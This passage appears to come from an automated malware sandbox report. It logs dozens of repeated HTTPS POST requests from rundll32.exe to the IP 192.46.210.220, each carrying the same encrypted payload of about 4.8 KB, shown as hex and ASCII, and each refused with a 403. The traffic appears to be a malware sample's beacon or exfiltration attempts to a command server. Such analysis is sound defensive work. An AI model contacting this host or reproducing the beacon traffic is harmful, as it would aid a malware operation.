                                                                                                          2021-10-28 03:10:53 UTC364OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:54 UTC369INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:54 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          74192.168.2.650125192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:54 UTC369OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:54 UTC369OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:55 UTC374INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:55 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          75192.168.2.650131192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:57 UTC374OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:57 UTC374OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:58 UTC383INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:58 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          76192.168.2.650133192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:58 UTC379OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:58 UTC379OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:58 UTC384INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:58 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          77192.168.2.650140192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:01 UTC384OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:01 UTC384OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:02 UTC393INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:02 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          78192.168.2.650141192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:02 UTC389OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:02 UTC389OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:02 UTC394INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:02 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          79192.168.2.650148192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:05 UTC394OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:05 UTC394OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:06 UTC403INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:06 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          8192.168.2.649790192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:08:42 UTC39OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:08:42 UTC40OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:08:43 UTC49INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:08:43 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          80192.168.2.650149192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:05 UTC398OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:05 UTC399OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:06 UTC403INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:06 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          81192.168.2.650156192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:09 UTC404OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:09 UTC404OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:10 UTC413INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:10 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          82192.168.2.650157192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:09 UTC408OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:09 UTC409OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:10 UTC413INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:10 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          83192.168.2.650164192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:13 UTC414OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:13 UTC414OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:14 UTC423INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:13 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          84192.168.2.650165192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:13 UTC418OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:13 UTC419OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:14 UTC423INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:14 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          85192.168.2.650172192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:17 UTC424OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
